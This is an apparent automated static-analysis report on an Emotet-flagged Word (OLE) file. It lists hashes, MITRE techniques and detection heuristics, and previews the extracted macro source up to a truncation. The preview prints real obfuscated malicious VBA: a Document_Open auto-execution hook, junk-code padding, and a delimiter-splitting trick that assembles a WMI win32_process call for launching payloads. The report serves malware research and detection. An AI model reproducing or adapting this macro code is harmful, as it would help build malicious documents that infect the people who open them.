Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 17e6fbbc141f6b7e…

MALICIOUS

Office (OLE)

Size: 253.4 KB · Created: 2020-01-17 06:37:00 · Authoring application: Microsoft Office Word · First seen: 2020-09-24
MD5: 1bf4c097c94e03f5009b0d74b7d504d9
SHA-1: a5c084eb04baea13b631229be752313fe7fe6fd9
SHA-256: 17e6fbbc141f6b7e27df7ddeb423b4aee5adfecd80db00b9990b85ca7d75fa88
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common execution vector for Emotet. The ClamAV detection explicitly names Emotet. The macro's use of GetObject and p-code execution further supports this classification. The macro likely downloads and executes a secondary payload, a typical Emotet behavior.

Heuristics 6

  • ClamAV: Doc.Malware.Emotet-7544675-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotet-7544675-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 7809 bytes
SHA-256: 81cbb7693744e371675d50f53b08f806271878894c06cbb3a0cfdd7264d83790
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Csdyaeczv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Nwmfvwrdv
End Sub

Attribute VB_Name = "Jedxnmjg"
Attribute VB_Base = "0{980FB290-0271-4E09-8A3C-1AA360368E35}{611F269E-E5BA-4C07-920C-3822E64BCABB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Tmiquaxqxb"
Function Bhntobeqq()
   Select Case Hxncfvcvgqr
      Case 5815
         Laoschbyd = Log(3331)
         Znjmabclwfkr = 4
         Hvxqfohzsjl = CSng(trrD0)
      Case Xzhqeztcsmpvf
         Haaicdvle = ChrW(RSd)
         Klavzbwcemoog = 472
         Mojhvzzcrric = Cos(rfTD3Iu)
      Case 5
         Bndifpibwmoyd = 76
         Tluqkqhcwmyk = Atn(3391)
         Eqywgcylga = Sin(Krwtxwpjyf)
End Select
Pjugchbf = ChrW(wdKeyP)
   Select Case Tnpexudllvz
      Case 5815
         Tbchzepohlf = Log(3331)
         Ackgmevi = 4
         Pbhmaxpltm = CSng(trrD0)
      Case Uvaeqkbl
         Xutbbejvkh = ChrW(RSd)
         Ngrspqraluq = 472
         Oghnlgilf = Cos(rfTD3Iu)
      Case 5
         Szwlcycfbg = 76
         Myvltbycettn = Atn(3391)
         Hzaqdhcf = Sin(Ugxnslybglu)
End Select
Abckmkpb = Pjugchbf + Jedxnmjg.Pjdappwsjrn + Jedxnmjg.Kkywopkkribmw
   Select Case Qkxwgtho
      Case 5815
         Itbstcxbyn = Log(3331)
         Gyuiscxvid = 4
         Dcspxizhw = CSng(trrD0)
      Case Uahawxwlxwgd
         Xberzdfg = ChrW(RSd)
         Qjhdqnwocfa = 472
         Caxlsqixyu = Cos(rfTD3Iu)
      Case 5
         Hupwanod = 76
         Nptujzrata = Atn(3391)
         Brcrnposspt = Sin(Tgscrlfssm)
End Select
losd = Jedxnmjg.Fvnepzivdgdec.GroupName
Tqkuhkzfjb = Split(Abckmkpb + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=")
   Select Case Gjctghqh
      Case 5815
         Rqgvoipa = Log(3331)
         Xihwgeedxet = 4
         Fspvjlcd = CSng(trrD0)
      Case Fythbwgisax
         Bfmccnkskqnac = ChrW(RSd)
         Fonleucxnw = 472
         Qvbafbunq = Cos(rfTD3Iu)
      Case 5
         Zpivvifgyx = 76
         Dmmyezhy = Atn(3391)
         Ftwiphyikvien = Sin(Ygphpfkwsynsd)
End Select
Bhntobeqq = Dowoomurive + Join(Tqkuhkzfjb, "") + Dowoomurive
   Select Case Gknntjcv
      Case 5815
         Fwpepfavti = Log(3331)
         Abugctwbicq = 4
         Sdvsnmqinhk = CSng(trrD0)
      Case Kpgllpor
         Tmgiyaccfy = ChrW(RSd)
         Bfcfvvgmujbaj = 472
         Wrbcwisbgger = Cos(rfTD3Iu)
      Case 5
         Efgmnnbjft = 76
         Xrjlgzrggl = Atn(3391)
         Tpjdwyrdybpev = Sin(Ttmmhjllbruae)
End Select
End Function
Function Nwmfvwrdv()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Jedxnmjg.Ifyphkyrel + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
   Select Case Ttrskoiywqmc
      Case 5815
         Cyojduioxo = Log(3331)
         Qulbjuuvra = 4
         Bfmopsdj = CSng(trrD0)
      Case Ccqpcmjfvc
         Xomugrio = ChrW(RSd)
         Ljhyiuyf = 472
         Ddsjlushmmfkt = Cos(rfTD3Iu)
      Case 5
         Ybulmbqsa = 76
         Hdeogqrkw = Atn(3391)
         Cjlzabiwaphq = Sin(Etzynlssfmod)
End Select
E = "//====dsfnnJJJsm388//="
   Select Case Hvjjwlmcjd
      Case 5815
         Mhpipmkodzq = Log(3331)
         Kxiemskvmt = 4
         Fqpxytnuihxj = CSng(trrD0)
      Case Orohhedylod
         Kwszowpkvureg = ChrW(RSd)
         Cdzyywesgf = 472
         Pgfbtawdypi = Cos(rfTD3Iu)
      Case 5
         Qgtxxcabrwi = 76
         Yagdl
... (truncated)